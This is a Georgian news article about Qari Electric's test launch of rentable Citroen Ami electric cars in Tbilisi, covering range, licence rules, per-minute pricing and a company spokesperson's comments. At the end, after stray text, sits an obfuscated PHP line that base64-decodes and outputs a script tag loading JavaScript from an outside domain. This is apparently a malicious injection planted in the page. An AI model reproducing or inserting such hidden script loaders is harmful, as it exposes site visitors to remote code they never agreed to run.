celsiusi
ავერსი შნაიდერი
თბილისში ქართული სტარტაპის Qari Electric-ის ახალი ელექტრომანქანები გამოჩნდა. კომპანიის ახალ Citroen Ami-ს მოდელის მანქანებს, რომლის მაქსიმალური სიჩქარე 45 კმ/სთ-ია, სრული დამუხტვით მაქსიმუმ 75 კმ-ის დაფარვა შეუძლია. ისინი ჯერჯერობით სატესტო რეჟიმით ჩაეშვა.
 
"ქარის" ელექტრომანქანა, რომლის სამართავადაც მოქალაქეებს B ან B1 კატეგორიის მართვის მოწმობა დასჭირდებათ, ორ ადამიანს იტევს. მანქანის კომპაქტური დიზაინის საშუალებით კი ადგილი ბარგისთვისაც რჩება.
 
რაც შეეხება ტარიფს, “ქარის” ელექტრომანქანით მგზავრობის წამოწყება 1 ლარია, ყოველი წუთის ღირებულება კი 80 თეთრი.
 
როგორც bm.ge-ს “ქარის” მარკეტინგის ხელმძღვანელმა დემეტრე დათიაშვილმა განუცხადა, Citroen Ami-ს თითოეული ნაწილი გადამუშავებას ექვემდებარება, რითაც პლანეტა ნაკლებად ზიანდება. ამასთან, ელექტრომანქანა არც გამონაბოლქვს გამოყოფს და მისი გადაადგილება არ ხმაურს იწვევს .
 
“დღეიდან “ქარის” აპლიკაციაში მომხმარებელს რამდენიმე სატრანსპორტო სერვისის არჩევანის საშუალება ექნება. ელექტრომოპედებს სატესტო რეჟიმით ელექტრომანქანებიც დაემატა. აპლიკაციაში ორივე ელექტრო ტრანსპორტისთვის განსაზღვრულია სპეციალური საპარკინგე ზონები. აღსანიშნავია, რომ Citroen Ami-ს ზომა მოსახერხებელია იმ ურბანული გარემოსთვის, სადაც პარკინგი ყოველდღიური პრობლემაა.
 
იმისათვის, რომ მომხმარებელმა ჩვენი ახალი სერვისით სარგებლობა შეძლოს, უპირველესად აპლიკაცია უნდა ჩამოტვირთოს და დარეგისტრირდეს. მანქანის სამართავად კი B ან B1 კატეგორიის მართვის მოწმობაა საჭირო”, - აღნიშნავს “ქარის” მარკეტინგის ხელმძღვანელი.
995
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");